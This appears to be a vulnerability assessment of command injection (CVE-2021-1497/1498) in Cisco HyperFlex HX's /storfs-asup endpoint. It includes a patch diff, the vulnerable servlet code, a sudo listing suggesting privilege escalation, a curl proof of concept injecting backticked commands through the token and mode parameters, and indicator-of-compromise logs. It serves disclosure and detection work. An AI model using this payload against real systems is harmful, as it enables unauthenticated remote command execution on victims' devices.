Multiple vulnerabilities in the web-based management interface of Cisco HyperFlex HX could allow an unauthenticated, remote attacker to perform command injection attacks against an affected device. For more information about these vulnerabilities, see the Details section of this advisory. **Recent assessments:** **wvu-r7** at May 18, 2021 12:18am UTC reported: _Attacker value is a little lower because I was able to test only the installer._ # CVE-2021-1497/CVE-2021-1498 Command injection in the `/storfs-asup` endpoint’s `token` and `mode` parameters. ## Patch --- unpatched/web.xml 2021-05-17 19:06:17.000000000 -0500 +++ patched/web.xml 2021-05-17 19:06:23.000000000 -0500 @@ -69,17 +69,6 @@ </servlet-mapping> <servlet> - <servlet-name>Springpath Storfs ASUP</servlet-name> - <servlet-class>com.storvisor.sysmgmt.service.StorfsAsup</servlet-class> - <load-on-startup>1</load-on-startup> - </servlet> - - <servlet-mapping> - <servlet-name>Springpath Storfs ASUP</servlet-name> - <url-pattern>/storfs-asup/*</url-pattern> - </servlet-mapping> - - <servlet> <servlet-name>Springpath Upgrade Image Upload Service</servlet-name> <servlet-class>com.storvisor.sysmgmt.service.StorvisorFileUploader</servlet-class> </servlet> ## Vulnerability protected void processRequest(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { String action = request.getParameter("action"); if (action == null) { String msg = "Action for the servlet need be specified."; writeErrorResponse(response, msg); return; } try { String token = request.getParameter("token"); StringBuilder cmd = new StringBuilder(); cmd.append("exec /bin/storfs-asup "); cmd.append(token); String mode = request.getParameter("mode"); cmd.append(" "); cmd.append(mode); cmd.append(" > /dev/null"); logger.info("storfs-asup cmd to run : " + cmd); ProcessBuilder pb = new ProcessBuilder(new String[] { "/bin/bash", "-c", cmd.toString() }); logger.info("Starting the storfs-asup now: "); long startTime = System.currentTimeMillis(); Process p = pb.start(); InputStream errStream = p.getErrorStream(); String errMsg = FileUtils.readToString(errStream); int exitCode = p.waitFor(); long timeTaken = System.currentTimeMillis() - startTime; logger.info("storfs-asup command completed in (" + timeTaken + " ) milliseconds, with exit code (" + exitCode + ") and error message: " + errMsg); errStream.close(); OutputStream outStream = p.getOutputStream(); outStream.flush(); outStream.close(); if (exitCode != 0) throw new Exception(errMsg); } catch (IOException ex) { logger.error("Failed to generate asup: " + ex); } catch (Exception ie) { logger.error("Failed to run the /bin/storfs-asup command."); } finally { logger.info("Done executing asup command. "); } } tomcat7@HyperFlex-Installer-4:~$ sudo -l Matching Defaults entries for tomcat7 on HyperFlex-Installer-4: !lecture, tty_tickets, !fqdn User tomcat7 may run the following commands on HyperFlex-Installer-4: (ALL) NOPASSWD: /opt/springpath/storfs-support/support.py (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_asup.sh (ALL) NOPASSWD: /opt/springpath/storfs-asup/generate_sch.sh tomcat7@HyperFlex-Installer-4:~$ sudo /opt/springpath/storfs-support/support.py --help Usage: support.py [options] Options: -h, --help show this help message and exit -t TARGET, --target=TARGET Target directory where the support bundle should go (XXX: This could be a remote host(dir), ex: hostname:/foo). Optional. Default = /tmp -i INSTALLDIR, --installdir=INSTALLDIR Install directory for storfs. Optional. -k ZKDIR, --zkdir=ZKDIR zookeeper directory for storfs. Optional -l LOGDIR, --logdir=LOGDIR log directory for storfs. Optional --asupdir=ASUPDIR asup directory for storfs. Optional -c COREDIR, --coredir=COREDIR core directory for storfs. Optional -m MANIFESTDIR, --manifestdir=MANIFESTDIR Manifest directory for storfs support. All files with .mfx extension in this directory will be processed. Optional --list List the manifests. Optional -f MANIFESTFILES, --manifest-file=MANIFESTFILES Manifest file to use for generating support. Multiple manifest files can be specified. Manifests files are required to have .mfx suffix. Optional (Cannot be with -m option) -e TOOLSEXEDIR, --toolsexedir=TOOLSEXEDIR log directory for storfs binary files. Optional --hypervdir=HYPERVDIR log directory for hyperv binary files. Optional -o TOOLSDIR, --toolsdir=TOOLSDIR Path for storfs tools. Optional -r RUNTIMEDIR, --runtimedir=RUNTIMEDIR Path for runtime dir (which contains storfs_running_process.pid files). Optional -b BUILDTYPE, --buildtype=BUILDTYPE Build type that was running. Optional. Default = debug -a ADDITIONAL_FILES, --additional-files=ADDITIONAL_FILES any additional files/directories (not in manifest) that should be added to the support bundle. Optional. --dry-run Process manifests to make sure that there are no errors tomcat7@HyperFlex-Installer-4:~$ ls /opt/springpath/storfs-support/*.mfx /opt/springpath/storfs-support/springpath-basic.mfx /opt/springpath/storfs-support/springpath-zookeeper-no-db.mfx /opt/springpath/storfs-support/springpath.mfx /opt/springpath/storfs-support/springpath-logs.mfx /opt/springpath/storfs-support/springpath-default-os.mfx /opt/springpath/storfs-support/springpath-extended.mfx /opt/springpath/storfs-support/springpath-default-asup.mfx /opt/springpath/storfs-support/deployment.mfx /opt/springpath/storfs-support/springpath-mgmt.mfx /opt/springpath/storfs-support/springpath-witness.mfx /opt/springpath/storfs-support/springpath-default-asup-cli-esx.mfx /opt/springpath/storfs-support/springpath-default-asup-hyperv.mfx /opt/springpath/storfs-support/springpath-zookeeper.mfx /opt/springpath/storfs-support/springpath-default-asup-esx.mfx /opt/springpath/storfs-support/springpath-default-event-asup.mfx /opt/springpath/storfs-support/springpath-perf.mfx /opt/springpath/storfs-support/springpath-default-asup-cli-hyperv.mfx /opt/springpath/storfs-support/springpath-exhaustive.mfx tomcat7@HyperFlex-Installer-4:~$ head /opt/springpath/storfs-support/springpath-basic.mfx # Springpath manifest file. Contains just basic logs. # Simplified from springpath-mgmt.mfx ["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/var/jail/var/log/springpath"] ["copy", "TIMEOUT_NONE", "IGNORE_ERROR", "/etc/iptables_node_cluster.rules"] ["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "iptables --list -n -v"] ["exec", "TIMEOUT_NONE", "IGNORE_ERROR", "bom-check.sh"] ["exec", "TIMEOUT=120", "IGNORE_ERROR", "mstcli cluster diag"] ["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli cluster info"] ["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli appliance list"] ["exec", "TIMEOUT=45", "IGNORE_ERROR", "mstcli datastore list"] tomcat7@HyperFlex-Installer-4:~$ ## PoC wvu@kharak:~$ curl -v -d 'action=&token=`id`&mode=`id`' * Trying * TCP_NODELAY set * Connected to ( port 80 (#0) > POST /storfs-asup HTTP/1.1 > Host: > User-Agent: curl/7.64.1 > Accept: */* > Content-Length: 28 > Content-Type: application/x-www-form-urlencoded > * upload completely sent off: 28 out of 28 bytes < HTTP/1.1 200 OK < Server: nginx/1.8.1 < Date: Tue, 18 May 2021 00:54:26 GMT < Content-Length: 0 < Connection: keep-alive < Front-End-Https: on < * Connection #0 to host left intact * Closing connection 0 wvu@kharak:~$ ## IOCs ==> /var/log/nginx/access.log <== - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.1" 200 0 "-" "curl/7.64.1" ==> /var/log/springpath/stBootstrapGuiBackend.log <== 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null 2021-05-18-00:54:26.012 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():64 - Starting the storfs-asup now: 2021-05-18-00:54:26.017 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory 2021-05-18-00:54:26.020 [tomcat-http-2] ERROR com.storvisor.sysmgmt.service.StorfsAsup.processRequest():89 - Failed to run the /bin/storfs-asup command. 2021-05-18-00:54:26.020 [tomcat-http-2] INFO com.storvisor.sysmgmt.service.StorfsAsup.processRequest():91 - Done executing asup command. ==> /var/log/tomcat7/catalina.out <== 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:59 - storfs-asup cmd to run : exec /bin/storfs-asup `id` `id` > /dev/null 2021-05-18-00:54:26.012 INFO com.storvisor.sysmgmt.service.StorfsAsup:64 - Starting the storfs-asup now: 2021-05-18-00:54:26.017 INFO com.storvisor.sysmgmt.service.StorfsAsup:71 - storfs-asup command completed in (4 ) milliseconds, with exit code (127) and error message: /bin/bash: /bin/storfs-asup: No such file or directory 2021-05-18-00:54:26.020 ERROR com.storvisor.sysmgmt.service.StorfsAsup:89 - Failed to run the /bin/storfs-asup command. 2021-05-18-00:54:26.020 INFO com.storvisor.sysmgmt.service.StorfsAsup:91 - Done executing asup command. ==> /var/log/tomcat7/localhost_access_log.2021-05-17.txt <== - - [17/May/2021:17:54:26 -0700] "POST /storfs-asup HTTP/1.0" 200 - Assessed Attacker Value: 4 Assessed Attacker Value: 4Assessed Attacker Value: 5